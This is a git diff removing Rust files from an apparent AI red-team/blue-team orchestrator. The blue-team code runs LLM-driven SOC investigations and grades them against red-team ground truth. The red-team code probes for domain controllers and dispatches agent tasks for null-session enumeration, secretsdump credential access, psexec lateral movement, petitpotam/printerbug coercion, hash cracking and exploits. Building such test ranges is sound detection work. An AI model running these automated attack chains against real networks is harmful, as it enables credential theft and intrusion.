investigation_id, - error = %e, - "Failed to write investigation report" - ); - } - } -} - -/// Outcome of a completed investigation. -#[derive(Debug)] -#[allow(dead_code)] -pub enum InvestigationOutcome { - Completed { - verdict: String, - summary: String, - steps: u32, - }, - Escalated { - reason: String, - severity: String, - }, - Failed { - error: String, - }, -} - -fn process_outcome(outcome: &AgentLoopOutcome, investigation_id: &str) -> InvestigationOutcome { - match &outcome.reason { - LoopEndReason::TaskComplete { result, .. } => InvestigationOutcome::Completed { - verdict: extract_verdict(result), - summary: result.clone(), - steps: outcome.steps, - }, - LoopEndReason::RequestAssistance { issue, .. } => InvestigationOutcome::Escalated { - reason: issue.clone(), - severity: if issue.to_lowercase().contains("critical") { - "critical".into() - } else { - "high".into() - }, - }, - LoopEndReason::EndTurn { content } => InvestigationOutcome::Completed { - verdict: extract_verdict(content), - summary: content.clone(), - steps: outcome.steps, - }, - LoopEndReason::MaxSteps => InvestigationOutcome::Failed { - error: format!( - "Investigation {investigation_id} hit max steps ({})", - outcome.steps - ), - }, - LoopEndReason::MaxTokens => InvestigationOutcome::Failed { - error: format!("Investigation {investigation_id} hit max tokens"), - }, - LoopEndReason::Error(err) => InvestigationOutcome::Failed { error: err.clone() }, - } -} - -/// Extract a verdict from the investigation result text. -fn extract_verdict(text: &str) -> String { - let lower = text.to_lowercase(); - if lower.contains("true positive") { - "true_positive".into() - } else if lower.contains("false positive") { - "false_positive".into() - } else if lower.contains("benign") { - "benign".into() - } else if lower.contains("malicious") || lower.contains("confirmed threat") { - "true_positive".into() - } else { - "inconclusive".into() - } -} - -/// Score a completed investigation against red team ground truth. -/// -/// Loads the blue team investigation state and the red team operation state -/// from Redis, then runs all six scorers to produce a grade and gap analysis. -async fn score_against_ground_truth( - conn: &mut redis::aio::ConnectionManager, - investigation_id: &str, - operation_id: &str, - model: &str, - outcome: &AgentLoopOutcome, -) { - let blue_reader = BlueStateReader::new(investigation_id.to_string()); - let blue_state = match blue_reader.load_state(conn).await { - Ok(Some(state)) => state, - Ok(None) => { - warn!( - investigation_id = investigation_id, - "Skipping evaluation: blue team state not found in Redis" - ); - return; - } - Err(e) => { - warn!( - investigation_id = investigation_id, - error = %e, - "Skipping evaluation: failed to load blue team state" - ); - return; - } - }; - - let red_reader = RedisStateReader::new(operation_id.to_string()); - let red_state = match red_reader.load_state(conn).await { - Ok(Some(state)) => state, - Ok(None) => { - warn!( - operation_id = operation_id, - "Skipping evaluation: red team state not found in Redis" - ); - return; - } - Err(e) => { - warn!( - operation_id = operation_id, - error = %e, - "Skipping evaluation: failed to load red team state" - ); - return; - } - }; - - // Estimate duration from outcome step count (rough heuristic: ~10s per step) - let duration_seconds = outcome.steps as f64 * 10.0; - - let eval_output = evaluate_live_investigation(&blue_state, &red_state, model, duration_seconds); - - info!( - investigation_id = investigation_id, - operation_id = operation_id, - grade = eval_output.result.grade(), - overall_score = format!("{:.2}", eval_output.result.overall_score), - ioc_detection = format!("{:.2}", eval_output.result.ioc_detection_rate), - technique_coverage = format!("{:.2}", eval_output.result.technique_coverage), - evidence_count = eval_output.result.evidence_count, - "Investigation evaluation complete" - ); - - if !eval_output.gap_analysis.detection_gaps.is_empty() { - info!( - investigation_id = investigation_id, - gaps = eval_output.gap_analysis.detection_gaps.len(), - "Detection gaps identified — see gap analysis for recommendations" - ); - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_extract_verdict() { - assert_eq!(extract_verdict("This is a true positive"), "true_positive"); - assert_eq!( - extract_verdict("Determined to be a false positive"), - "false_positive" - ); - assert_eq!(extract_verdict("Activity is benign"), "benign"); - assert_eq!(extract_verdict("Confirmed threat"), "true_positive"); - assert_eq!(extract_verdict("Needs more data"), "inconclusive"); - } - - #[test] - fn test_process_outcome_completed() { - let outcome = AgentLoopOutcome { - reason: LoopEndReason::TaskComplete { - task_id: "inv1".into(), - result: "True positive: lateral movement confirmed".into(), - }, - total_usage: Default::default(), - steps: 10, - tool_calls_dispatched: 5, - discoveries: Vec::new(), - tool_outputs: Vec::new(), - }; - match process_outcome(&outcome, "inv1") { - InvestigationOutcome::Completed { verdict, steps, .. } => { - assert_eq!(verdict, "true_positive"); - assert_eq!(steps, 10); - } - other => panic!("Expected Completed, got {other:?}"), - } - } - - #[test] - fn test_process_outcome_escalated() { - let outcome = AgentLoopOutcome { - reason: LoopEndReason::RequestAssistance { - issue: "Critical: active data exfiltration".into(), - context: "".into(), - }, - total_usage: Default::default(), - steps: 3, - tool_calls_dispatched: 1, - discoveries: Vec::new(), - tool_outputs: Vec::new(), - }; - match process_outcome(&outcome, "inv1") { - InvestigationOutcome::Escalated { severity, .. } => { - assert_eq!(severity, "critical"); - } - other => panic!("Expected Escalated, got {other:?}"), - } - } -} diff --git a/ares-orchestrator/src/blue/mod.rs b/ares-orchestrator/src/blue/mod.rs deleted file mode 100644 index 391bceb8..00000000 --- a/ares-orchestrator/src/blue/mod.rs +++ /dev/null @@ -1,19 +0,0 @@ -//! Blue team investigation orchestrator. -//! -//! Consumes investigation requests from `ares:blue:investigations`, -//! dispatches tasks to specialized agents (triage, threat_hunter, -//! lateral_analyst, escalation_triage) via the blue task queue, -//! and processes results. -//! -//! Parallels the red team orchestrator but drives SOC investigation -//! workflows instead of attack chains. - -pub mod auto_submit; -mod callbacks; -pub mod chaining; -mod investigation; -mod runner; -mod sub_agent; - -pub use auto_submit::spawn_blue_auto_submit; -pub use runner::spawn_blue_orchestrator; diff --git a/ares-orchestrator/src/blue/runner.rs b/ares-orchestrator/src/blue/runner.rs deleted file mode 100644 index 33181f57..00000000 --- a/ares-orchestrator/src/blue/runner.rs +++ /dev/null @@ -1,403 +0,0 @@ -//! Blue team orchestrator service loop. -//! -//! Polls `ares:blue:investigations` for new investigation requests and -//! drives each through the investigation workflow using the LLM agent loop. - -use std::sync::Arc; -use std::time::Duration; - -use anyhow::{Context, Result}; -use redis::AsyncCommands; -use tokio::sync::watch; -use tracing::{error, info, warn}; - -use ares_core::state::blue_task_queue::BlueTaskQueue; -use ares_llm::{LlmProvider, ToolDispatcher}; - -use super::investigation::{self, Investigation}; - -/// Timeout for a single investigation run (45 minutes). -/// Loki queries via the Grafana proxy take 30-40s each from EC2, -/// so the agent needs more headroom to complete triage + hunting. -const INVESTIGATION_TIMEOUT_SECS: u64 = 2700; - -/// Threshold for considering a running investigation as stale (50 minutes). -const STALE_INVESTIGATION_THRESHOLD_SECS: i64 = 3000; - -/// Interval between periodic stale investigation checks (5 minutes). -const STALE_CHECK_INTERVAL_SECS: u64 = 300; - -/// Blue team investigation orchestrator. -/// -/// Owns the LLM provider and tool dispatcher, and drives investigations -/// from alert to completion. -pub struct BlueOrchestrator { - provider: Arc, - model_name: String, - dispatcher: Arc, - redis_url: String, -} - -impl BlueOrchestrator { - pub fn new( - provider: Box, - model_name: String, - dispatcher: Arc, - redis_url: String, - ) -> Self { - Self { - provider: Arc::from(provider), - model_name, - dispatcher, - redis_url, - } - } - - /// Clean up stale investigations left in "running" status. - /// - /// Scans `ares:blue:active_investigations` for investigation IDs whose - /// status has been `in_progress` for longer than the threshold. Marks - /// them as `failed` with an orphaned message and removes from the active set. - async fn cleanup_stale_investigations(&self) { - let conn = match redis::Client::open(self.redis_url.as_str()) { - Ok(client) => match client.get_connection_manager().await { - Ok(c) => c, - Err(e) => { - warn!("Stale cleanup: failed to connect to Redis: {e}"); - return; - } - }, - Err(e) => { - warn!("Stale cleanup: failed to open Redis client: {e}"); - return; - } - }; - let mut conn = conn; - - // Get all active investigation IDs - let active_ids: Vec = match conn - .smembers::<_, Vec>(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS) - .await - { - Ok(ids) => ids, - Err(e) => { - warn!("Stale cleanup: failed to read active investigations: {e}"); - return; - } - }; - - if active_ids.is_empty() { - return; - } - - let now = chrono::Utc::now(); - let mut cleaned = 0u32; - - for inv_id in &active_ids { - let status_key = format!("ares:blue:inv:{inv_id}:status"); - let status_json: Option = conn.get(&status_key).await.unwrap_or(None); - - let status_obj = match status_json - .as_deref() - .and_then(|s| serde_json::from_str::(s).ok()) - { - Some(v) => v, - None => continue, - }; - - let status = status_obj - .get("status") - .and_then(|v| v.as_str()) - .unwrap_or(""); - if status != "in_progress" { - continue; - } - - let started_at = status_obj - .get("started_at") - .and_then(|v| v.as_str()) - .and_then(|s| chrono::DateTime::parse_from_rfc3339(s).ok()) - .map(|dt| dt.with_timezone(&chrono::Utc)); - - let elapsed_secs = match started_at { - Some(dt) => (now - dt).num_seconds(), - None => STALE_INVESTIGATION_THRESHOLD_SECS + 1, // no timestamp = assume stale - }; - - if elapsed_secs > STALE_INVESTIGATION_THRESHOLD_SECS { - let hours = elapsed_secs as f64 / 3600.0; - let error_msg = format!( - "Investigation orphaned after orchestrator restart (was running {hours:.1}h)" - ); - - // Update status to failed - let updated = serde_json::json!({ - "status": "failed", - "started_at": status_obj.get("started_at").unwrap_or(&serde_json::Value::Null), - "failed_at": now.to_rfc3339(), - "error": error_msg, - }); - let data = serde_json::to_string(&updated).unwrap_or_default(); - let _: Result<(), _> = conn.set_ex::<_, _, ()>(&status_key, &data, 86400).await; - - // Remove from active set - let _: Result<(), _> = conn - .srem::<_, _, ()>(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, inv_id) - .await; - - warn!( - investigation_id = %inv_id, - elapsed_hours = format!("{hours:.1}"), - "Marked stale investigation as failed" - ); - cleaned += 1; - } - } - - if cleaned > 0 { - info!(count = cleaned, "Stale investigation cleanup complete"); - } - } - - /// Run the blue team orchestration loop until shutdown. - /// - /// Polls `ares:blue:investigations` for new investigation requests. - /// Each request contains an alert payload and LLM model to use. - pub async fn run(&self, mut shutdown_rx: watch::Receiver) -> Result<()> { - info!("Blue team orchestrator starting"); - - // Clean up stale investigations from previous runs - self.cleanup_stale_investigations().await; - - let mut task_queue = BlueTaskQueue::connect(&self.redis_url) - .await - .context("Failed to connect blue task queue to Redis")?; - - let mut retry_delay = Duration::from_secs(1); - let max_retry_delay = Duration::from_secs(30); - let mut last_stale_check = std::time::Instant::now(); - - loop { - // Check shutdown - if *shutdown_rx.borrow() { - info!("Blue orchestrator: shutdown signalled"); - break; - } - - // Poll for investigation requests - let poll_result = tokio::select! { - result = task_queue.pop_investigation_request(5.0) => result, - _ = shutdown_rx.changed() => { - info!("Blue orchestrator: shutdown during poll"); - break; - } - }; - - match poll_result { - Ok(Some(request)) => { - retry_delay = Duration::from_secs(1); - - let investigation_id = request - .get("investigation_id") - .and_then(|v| v.as_str()) - .map(String::from) - .unwrap_or_else(|| uuid::Uuid::new_v4().to_string()); - - let alert = request - .get("alert") - .cloned() - .unwrap_or(serde_json::json!({})); - - let raw_model = request - .get("model") - .and_then(|v| v.as_str()) - .filter(|s| !s.is_empty()) - .unwrap_or(&self.model_name); - // Strip provider prefix (e.g. "openai/gpt-5.2" → "gpt-5.2") - let model = raw_model - .split_once('/') - .map(|(_, name)| name) - .unwrap_or(raw_model) - .to_string(); - - let operation_id = request - .get("operation_id") - .and_then(|v| v.as_str()) - .map(String::from); - - // Report directory: request > ARES_REPORT_DIR env > ~/.ares/reports/ - let report_dir = request - .get("report_dir") - .and_then(|v| v.as_str()) - .map(String::from) - .or_else(|| std::env::var("ARES_REPORT_DIR").ok()); - - info!( - investigation_id = %investigation_id, - model = %model, - operation_id = ?operation_id, - "Received investigation request" - ); - - // Register the investigation - if let Err(e) = task_queue - .register_investigation(&investigation_id, &alert, &model) - .await - { - warn!(err = %e, "Failed to register investigation"); - } - - // Run the investigation - let investigation = Investigation::new( - investigation_id.clone(), - alert, - model, - operation_id, - report_dir, - ); - - let mut conn = redis::Client::open(self.redis_url.as_str())? - .get_connection_manager() - .await?; - - match tokio::time::timeout( - Duration::from_secs(INVESTIGATION_TIMEOUT_SECS), - investigation::run_investigation( - &investigation, - Arc::clone(&self.provider), - Arc::clone(&self.dispatcher), - &mut task_queue, - &self.redis_url, - &mut conn, - ), - ) - .await - { - Ok(Ok(outcome)) => { - info!( - investigation_id = %investigation_id, - outcome = ?outcome, - "Investigation finished" - ); - } - Ok(Err(e)) => { - error!( - investigation_id = %investigation_id, - err = %e, - "Investigation failed with error" - ); - } - Err(_elapsed) => { - error!( - investigation_id = %investigation_id, - timeout_secs = INVESTIGATION_TIMEOUT_SECS, - "Investigation timed out — cancelling" - ); - - // Write timed_out status so downstream consumers know - // what happened (the future was dropped before it could - // write its own final status). - investigation - .state_writer - .set_status( - &mut conn, - "timed_out", - Some("Investigation exceeded timeout"), - ) - .await - .ok(); - - // Release the lock that was acquired inside the - // now-cancelled future. - investigation - .state_writer - .release_lock(&mut conn) - .await - .ok(); - - // Generate a partial report from whatever evidence was - // collected before the timeout. - investigation::generate_report( - &mut conn, - &investigation.investigation_id, - investigation.report_dir.as_deref(), - ) - .await; - } - } - - // Clean up active investigation registration - let _: Result<(), _> = conn - .srem::<_, _, ()>( - ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, - &investigation_id, - ) - .await; - } - Ok(None) => { - retry_delay = Duration::from_secs(1); - // Periodic stale investigation cleanup - if last_stale_check.elapsed() >= Duration::from_secs(STALE_CHECK_INTERVAL_SECS) - { - self.cleanup_stale_investigations().await; - last_stale_check = std::time::Instant::now(); - } - } - Err(e) => { - let error_str = e.to_string().to_lowercase(); - let is_conn_error = ["connection", "closed", "timeout", "broken", "reset"] - .iter() - .any(|kw| error_str.contains(kw)); - - if is_conn_error { - warn!( - delay_secs = retry_delay.as_secs(), - "Blue orchestrator: connection error, will reconnect: {e}" - ); - tokio::select! { - _ = tokio::time::sleep(retry_delay) => {} - _ = shutdown_rx.changed() => break, - } - retry_delay = (retry_delay * 2).min(max_retry_delay); - - // Reconnect the task queue — the previous ConnectionManager - // can be stuck after Redis restarts or prolonged outages. - match BlueTaskQueue::connect(&self.redis_url).await { - Ok(new_queue) => { - task_queue = new_queue; - info!("Blue orchestrator: reconnected to Redis"); - } - Err(reconnect_err) => { - warn!("Blue orchestrator: reconnect failed: {reconnect_err}"); - } - } - } else { - error!("Blue orchestrator: non-connection error: {e}"); - tokio::time::sleep(Duration::from_secs(5)).await; - } - } - } - } - - info!("Blue team orchestrator stopped"); - Ok(()) - } -} - -/// Spawn the blue team orchestrator as a background tokio task. -/// -/// Returns a `JoinHandle` that resolves when the orchestrator stops. -pub fn spawn_blue_orchestrator( - provider: Box, - model_name: String, - dispatcher: Arc, - redis_url: String, - shutdown_rx: watch::Receiver, -) -> tokio::task::JoinHandle<()> { - tokio::spawn(async move { - let orchestrator = BlueOrchestrator::new(provider, model_name, dispatcher, redis_url); - if let Err(e) = orchestrator.run(shutdown_rx).await { - error!("Blue orchestrator exited with error: {e}"); - } - }) -} diff --git a/ares-orchestrator/src/blue/sub_agent.rs b/ares-orchestrator/src/blue/sub_agent.rs deleted file mode 100644 index 04b8f5cf..00000000 --- a/ares-orchestrator/src/blue/sub_agent.rs +++ /dev/null @@ -1,142 +0,0 @@ -//! Infrastructure wrapper types for blue team sub-agent dispatch. -//! -//! - [`BlueToolDispatcher`] — wraps the red-team dispatcher and routes blue -//! tool names to `ares_tools::blue::dispatch_blue()` for local execution. -//! - [`SubAgentCallbackHandler`] — minimal callback handler for blue -//! sub-agents that handles lifecycle completion tools and tracks token usage. - -use std::sync::Arc; - -use anyhow::Result; -use tracing::{debug, warn}; - -use ares_llm::agent_loop::CallbackResult; -use ares_llm::{CallbackHandler, TokenUsage, ToolCall, ToolDispatcher, ToolExecResult}; - -use super::callbacks::BlueCallbackHandler; - -// --------------------------------------------------------------------------- -// Blue-aware tool dispatcher wrapper -// --------------------------------------------------------------------------- - -/// Timeout for individual blue tool executions (e.g. Loki/Grafana queries). -/// `execute_parallel_queries` runs up to 5 queries (2 concurrent), each with -/// a 90s HTTP timeout and up to 2 retries — worst-case ~540s. Give headroom. -const BLUE_TOOL_TIMEOUT_SECS: u64 = 600; - -/// Wraps an existing (red-team) dispatcher and intercepts blue tool names, -/// routing them to `ares_tools::blue::dispatch_blue()` for local execution. -/// Non-blue tools fall through to the inner dispatcher. -pub(super) struct BlueToolDispatcher { - pub(super) inner: Arc, -} - -#[async_trait::async_trait] -impl ToolDispatcher for BlueToolDispatcher { - async fn dispatch_tool( - &self, - role: &str, - task_id: &str, - call: &ToolCall, - ) -> Result { - if ares_tools::blue::is_blue_tool(&call.name) { - debug!(tool = %call.name, "Executing blue tool locally"); - match tokio::time::timeout( - std::time::Duration::from_secs(BLUE_TOOL_TIMEOUT_SECS), - ares_tools::blue::dispatch_blue(&call.name, &call.arguments), - ) - .await - { - Ok(Ok(output)) => Ok(ToolExecResult { - output: output.combined(), - error: if output.success { - None - } else { - Some(format!("tool exited with code {:?}", output.exit_code)) - }, - discoveries: None, - }), - Ok(Err(e)) => Ok(ToolExecResult { - output: String::new(), - error: Some(e.to_string()), - discoveries: None, - }), - Err(_elapsed) => { - warn!( - tool = %call.name, - timeout_secs = BLUE_TOOL_TIMEOUT_SECS, - "Blue tool execution timed out" - ); - Ok(ToolExecResult { - output: format!( - "Tool execution timed out after {BLUE_TOOL_TIMEOUT_SECS}s. \ - The data source may be unreachable. Try a simpler query or skip this step." - ), - error: Some("timeout".to_string()), - discoveries: None, - }) - } - } - } else { - self.inner.dispatch_tool(role, task_id, call).await - } - } -} - -// --------------------------------------------------------------------------- -// Sub-agent callback handler (lifecycle callbacks only) -// --------------------------------------------------------------------------- - -/// Minimal callback handler for blue sub-agents (triage, threat_hunter, etc.). -/// -/// Recognizes lifecycle completion tools (`triage_complete`, `hunt_complete`, -/// `lateral_complete`, etc.) so they end the sub-agent loop with `TaskComplete` -/// instead of falling through to the Redis dispatcher. -/// -/// Also tracks token usage per-investigation so blue team cost is visible. -pub(super) struct SubAgentCallbackHandler { - pub(super) investigation_id: String, - pub(super) redis_url: String, -} - -#[async_trait::async_trait] -impl CallbackHandler for SubAgentCallbackHandler { - fn is_callback(&self, tool_name: &str) -> bool { - matches!( - tool_name, - "triage_complete" - | "hunt_complete" - | "lateral_complete" - | "complete_investigation" - | "confirm_escalation" - | "downgrade_escalation" - | "request_reinvestigation" - | "route_to_team" - ) - } - - async fn handle_callback(&self, call: &ToolCall) -> Option> { - BlueCallbackHandler::handle_lifecycle_callback(call).map(Ok) - } - - async fn on_token_usage(&self, usage: &TokenUsage, model: &str) { - if usage.input_tokens == 0 && usage.output_tokens == 0 { - return; - } - if let Ok(client) = redis::Client::open(self.redis_url.as_str()) { - if let Ok(mut conn) = client.get_connection_manager().await { - if let Err(e) = ares_core::token_usage::increment_blue_token_usage( - &mut conn, - &self.investigation_id, - usage.input_tokens.into(), - usage.output_tokens.into(), - model, - ) - .await - { - warn!(err = %e, "Failed to record blue sub-agent token usage"); - } - } - } - } -} diff --git a/ares-orchestrator/src/bootstrap.rs b/ares-orchestrator/src/bootstrap.rs deleted file mode 100644 index fb389625..00000000 --- a/ares-orchestrator/src/bootstrap.rs +++ /dev/null @@ -1,164 +0,0 @@ -use std::sync::Arc; - -use anyhow::Result; -use redis::AsyncCommands; -use tracing::{info, warn}; - -use crate::config::OrchestratorConfig; -use crate::dispatcher::Dispatcher; -use crate::task_queue::TaskQueue; - -/// Probe target IPs on port 88 (Kerberos) then 389 (LDAP) to find a real DC. -/// Returns the first IP that accepts a TCP connection within 500ms. -pub(crate) async fn probe_dc_port(ips: &[String]) -> Option { - for port in [88u16, 389] { - for ip in ips { - let addr = format!("{ip}:{port}"); - if let Ok(Ok(_)) = tokio::time::timeout( - std::time::Duration::from_millis(500), - tokio::net::TcpStream::connect(&addr), - ) - .await - { - info!(ip = %ip, port = port, "DC probe: port open"); - return Some(ip.clone()); - } - } - } - None -} - -/// Write initial operation metadata to Redis so workers can discover the operation. -/// -/// Mirrors the Python `_initialize_state_and_persist()` in `_orchestrator.py`. -pub(crate) async fn bootstrap_meta(queue: &TaskQueue, config: &OrchestratorConfig) -> Result<()> { - use chrono::Utc; - - let mut conn = queue.connection(); - let meta_key = format!( - "{}:{}:{}", - ares_core::state::KEY_PREFIX, - config.operation_id, - "meta" - ); - - let now = Utc::now().to_rfc3339(); - - // started_at must only be set once — use HSETNX so restarts/recoveries - // don't overwrite the original start time (which would break runtime calc). - let started_at_json = serde_json::to_string(&now).unwrap_or_default(); - let _: bool = conn - .hset_nx(&meta_key, "started_at", &started_at_json) - .await?; - - // Remaining fields are safe to overwrite on restart - let fields: Vec<(&str, String)> = vec![ - ("initialized", "true".to_string()), - ( - "target_domain", - serde_json::to_string(&config.target_domain).unwrap_or_default(), - ), - ( - "target_ip", - serde_json::to_string(config.target_ips.first().unwrap_or(&String::new())) - .unwrap_or_default(), - ), - ( - "target_ips", - serde_json::to_string(&config.target_ips.join(",")).unwrap_or_default(), - ), - ]; - - for (field, value) in &fields { - let _: () = conn.hset(&meta_key, *field, value).await?; - } - // 24h TTL - let _: () = conn.expire(&meta_key, 86400).await?; - - // Set active operation pointer for worker discovery - let _: () = conn.set("ares:op:active", &config.operation_id).await?; - - // Write operation status key (matches Python's status tracking) - ares_core::state::set_operation_status(&mut conn, &config.operation_id, "running").await?; - - // Store the LLM model name for worker discovery and recovery - let model_key = format!( - "{}:{}:{}", - ares_core::state::KEY_PREFIX, - config.operation_id, - ares_core::state::KEY_MODEL, - ); - let model_name = std::env::var("ARES_LLM_MODEL").unwrap_or_default(); - if !model_name.is_empty() { - let _: () = conn.set_ex(&model_key, &model_name, 86400u64).await?; - } - - info!( - operation_id = %config.operation_id, - meta_key = %meta_key, - "Operation metadata written to Redis" - ); - Ok(()) -} - -/// Dispatch initial recon tasks for each target IP. -/// -/// This seeds the reactive automation pipeline — without these initial tasks, -/// all automation tasks have nothing to work with on a fresh operation. -pub(crate) async fn dispatch_initial_recon( - dispatcher: &Arc, - config: &OrchestratorConfig, -) -> usize { - let mut count = 0; - let domain = &config.target_domain; - - // Network scan + SMB sweep + SMB signing check per target IP. - // smb_sweep (NetExec) is critical: it discovers hostnames, OS, and DCs - // from SMB banners — data that nmap alone may miss. - for ip in &config.target_ips { - match dispatcher - .request_recon( - ip, - domain, - &["network_scan", "smb_sweep", "smb_signing_check"], - None, - ) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, ip = %ip, "Dispatched initial recon"); - count += 1; - } - Ok(None) => { - warn!(ip = %ip, "Initial recon throttled/deferred"); - } - Err(e) => { - warn!(ip = %ip, err = %e, "Failed to dispatch initial recon"); - } - } - } - - // User enumeration against all target IPs — we don't know which are DCs yet, - // and non-DC IPs may silently return no output. Null session for bootstrap. - for ip in &config.target_ips { - let payload = serde_json::json!({ - "target_ip": ip, - "domain": domain, - "techniques": ["user_enumeration"], - "null_session": true, - }); - match dispatcher - .throttled_submit("recon", "recon", payload, 5) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, ip = %ip, "Dispatched user enumeration"); - count += 1; - } - Ok(None) => warn!(ip = %ip, "User enumeration throttled/deferred"), - Err(e) => warn!(ip = %ip, err = %e, "Failed to dispatch user enumeration"), - } - } - - count -} diff --git a/ares-orchestrator/src/callback_handler/dispatch.rs b/ares-orchestrator/src/callback_handler/dispatch.rs deleted file mode 100644 index 5384e179..00000000 --- a/ares-orchestrator/src/callback_handler/dispatch.rs +++ /dev/null @@ -1,251 +0,0 @@ -//! Dispatch tools — submit sub-tasks via the Dispatcher, and disabled record tools. - -use anyhow::Result; -use tracing::{info, warn}; - -use ares_llm::provider::ToolCall; -use ares_llm::CallbackResult; - -use super::OrchestratorCallbackHandler; - -impl OrchestratorCallbackHandler { - pub(super) async fn dispatch_recon(&self, call: &ToolCall) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); - let domain = call.arguments["domain"].as_str().unwrap_or(""); - let techniques: Vec<&str> = call.arguments["techniques"] - .as_array() - .map(|arr| arr.iter().filter_map(|v| v.as_str()).collect()) - .unwrap_or_default(); - - let task_id = dispatcher - .request_recon(target_ip, domain, &techniques, None) - .await?; - - info!(target_ip = target_ip, "Dispatched recon task"); - Ok(CallbackResult::Continue(format!( - "Recon task dispatched: {}", - task_id.as_deref().unwrap_or("queued") - ))) - } - - pub(super) async fn dispatch_credential_access( - &self, - call: &ToolCall, - ) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let technique = call.arguments["technique"] - .as_str() - .unwrap_or("secretsdump"); - let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); - let domain = call.arguments["domain"].as_str().unwrap_or(""); - let username = call.arguments["username"].as_str().unwrap_or(""); - let password = call.arguments["password"].as_str().unwrap_or(""); - let priority = call.arguments["priority"].as_i64().unwrap_or(5) as i32; - - let cred = ares_core::models::Credential { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - password: password.to_string(), - domain: domain.to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }; - - let task_id = dispatcher - .request_credential_access(technique, target_ip, domain, &cred, priority) - .await?; - - info!( - technique = technique, - target_ip = target_ip, - "Dispatched credential access task" - ); - Ok(CallbackResult::Continue(format!( - "Credential access task ({technique}) dispatched: {}", - task_id.as_deref().unwrap_or("queued") - ))) - } - - pub(super) async fn dispatch_lateral(&self, call: &ToolCall) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); - let technique = call.arguments["technique"].as_str().unwrap_or("psexec"); - let username = call.arguments["username"].as_str().unwrap_or(""); - let password = call.arguments["password"].as_str().unwrap_or(""); - let domain = call.arguments["domain"].as_str().unwrap_or(""); - - let cred = ares_core::models::Credential { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - password: password.to_string(), - domain: domain.to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }; - - let task_id = dispatcher - .request_lateral(target_ip, &cred, technique) - .await?; - - info!( - technique = technique, - target_ip = target_ip, - "Dispatched lateral movement task" - ); - Ok(CallbackResult::Continue(format!( - "Lateral movement ({technique}) dispatched to {target_ip}: {}", - task_id.as_deref().unwrap_or("queued") - ))) - } - - pub(super) async fn dispatch_exploit(&self, call: &ToolCall) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let vuln_id = call.arguments["vuln_id"].as_str().unwrap_or(""); - let priority = call.arguments["priority"].as_i64().unwrap_or(3) as i32; - - // Look up vulnerability in state - let state = self.state.read().await; - let vuln = state.discovered_vulnerabilities.get(vuln_id); - - if let Some(vuln) = vuln { - let vuln = vuln.clone(); - drop(state); // Release lock before async dispatch - - let task_id = dispatcher.request_exploit(&vuln, priority).await?; - info!(vuln_id = vuln_id, "Dispatched exploit task"); - Ok(CallbackResult::Continue(format!( - "Exploit task for {} dispatched: {}", - vuln_id, - task_id.as_deref().unwrap_or("queued") - ))) - } else { - drop(state); - Ok(CallbackResult::Continue(format!( - "Vulnerability {vuln_id} not found in discovered vulnerabilities" - ))) - } - } - - pub(super) async fn dispatch_coercion(&self, call: &ToolCall) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let target_ip = call.arguments["target_ip"].as_str().unwrap_or(""); - let listener_ip = call.arguments["listener_ip"].as_str().unwrap_or(""); - let techniques: Vec<&str> = call.arguments["techniques"] - .as_array() - .map(|arr| arr.iter().filter_map(|v| v.as_str()).collect()) - .unwrap_or_else(|| vec!["petitpotam", "printerbug"]); - - let task_id = dispatcher - .request_coercion(target_ip, listener_ip, &techniques) - .await?; - - info!(target_ip = target_ip, "Dispatched coercion task"); - Ok(CallbackResult::Continue(format!( - "Coercion task dispatched to {target_ip}: {}", - task_id.as_deref().unwrap_or("queued") - ))) - } - - /// record_credential is disabled — credentials come only from tool output parsing. - /// This handler exists as a safety net in case the LLM somehow invokes it. - pub(super) async fn record_credential(&self, _call: &ToolCall) -> Result { - warn!("record_credential called but disabled — credentials are auto-extracted from tool output"); - Ok(CallbackResult::Continue( - "This tool is disabled. Credentials are automatically extracted from tool output. \ - Focus on running tools that produce credential data (secretsdump, lsassy, netexec, etc.) \ - and the system will parse and store credentials automatically." - .to_string(), - )) - } - - /// record_timeline_event is disabled — timeline events are auto-generated from - /// state changes (credential/hash/host discoveries) in result_processing.rs. - /// This handler exists as a safety net in case the LLM somehow invokes it. - pub(super) async fn record_timeline_event(&self, _call: &ToolCall) -> Result { - warn!("record_timeline_event called but disabled — timeline events are auto-generated from discoveries"); - Ok(CallbackResult::Continue( - "This tool is disabled. Timeline events are automatically generated when \ - credentials, hashes, and hosts are discovered from tool output. Focus on \ - running attack tools and the system will build the timeline automatically." - .to_string(), - )) - } - - pub(super) async fn dispatch_crack(&self, call: &ToolCall) -> Result { - let dispatcher = self - .dispatcher - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Dispatcher not configured"))?; - - let hash_value = call.arguments["hash_value"].as_str().unwrap_or(""); - let hash_type = call.arguments["hash_type"].as_str().unwrap_or("ntlm"); - let username = call.arguments["username"].as_str().unwrap_or(""); - let domain = call.arguments["domain"].as_str().unwrap_or(""); - - let hash = ares_core::models::Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value: hash_value.to_string(), - hash_type: hash_type.to_string(), - domain: domain.to_string(), - cracked_password: None, - source: String::new(), - discovered_at: None, - parent_id: None, - attack_step: 0, - aes_key: None, - }; - - let task_id = dispatcher.request_crack(&hash).await?; - - info!(hash_type = hash_type, "Dispatched crack task"); - 